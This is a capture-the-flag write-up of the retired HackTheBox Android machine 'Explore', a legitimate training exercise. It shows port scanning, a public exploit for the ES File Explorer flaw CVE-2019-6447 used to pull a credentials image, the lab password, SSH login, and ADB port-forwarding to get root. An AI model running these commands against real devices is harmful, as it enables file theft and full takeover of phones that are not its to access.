HackTheBox - Explore



OS Difficulty IP Address Status
Android Easy 10.10.10.247 Retired

This was classified as an easy box by bertolis on HackTheBox and my first experience with Android exploitation. Enumerating the opened ports, we discover a SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method to gain foothold. For privilege escalation, we will setup a SSH Tunnel to execute adb commands and gain root.

Phase 1 - Enumeration

Nmap

We first run a network scan to enumerate open ports.

PORT     STATE    SERVICE VERSION
2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.91%I=7%D=10/25%Time=6176573F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");

From the results above, we see that SSH is opened on port 2222 and it’s banner states that it’s “Banana Studio.” A quick Google search reveals that Banana Studio is a SSH Server for Android operating systems.

Since we are not sure whether the output of previous nmap command shows all open ports, we will also run a full port scan on the target with the following:
sudo nmap -p- 10.10.10.247

OUTPUT:

PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown

Seeing that the four ports running were (2222, 5555, 42135, 45225, 59777) We did some research on common uses of those ports on Android operating systems. Information I found included:

  • 2222: SimpleSSH
  • 5555: Android Debug Bridge (ADB)
  • 59777: ES File Explorer

Phase 2 - Exploitation

CVE-2019-6447

Doing some research on each port, we find something on port 59777 which is for ES File Explorer, we find a vulnerability that allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local network.

Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447

Running the Python script with the following commands shows us the listings on the directory:
python3 exploit.py listPics 10.10.10.247

OUTPUT:
creds.jpg looks most intersting

Let’s download creds.jpg with the following command.
python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

And open the image.
kristi:Kr1sT!5h@Rp3xPl0r3!

And we got some credentials, we will try to login with the SSH Server opened on the Android device with the following command:
ssh kristi@10.10.10.247 -p 2222

OUTPUT:
enter image description here

And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt

Phase 3 - Privilege Escalation

Port Forwarding

Since we have access to the device through SSH, and we know that there’s an ADB service running on port 5555; means we can execute commands with ADB.
In order to run ADB commands on the device, we will have to set up SSH port forwarding with the following command:

ssh kristi@10.10.10.247 -p 2222 -L 5555:localhost:5555

Android Debug Bridge (adb)

ADB commands help ⇐ Official documentation to adb commands.

We will run the following commands on the device, gain a shell, and escalate that shell to root.

# to establist a connection
adb connect 127.0.0.1:5555

# to list connected devices
adb devices

# to connect to specified device with interactive shell
adb -s 127.0.0.1:5555 shell

enter image description here

And we are root! root.txt can be found in /data/root.txt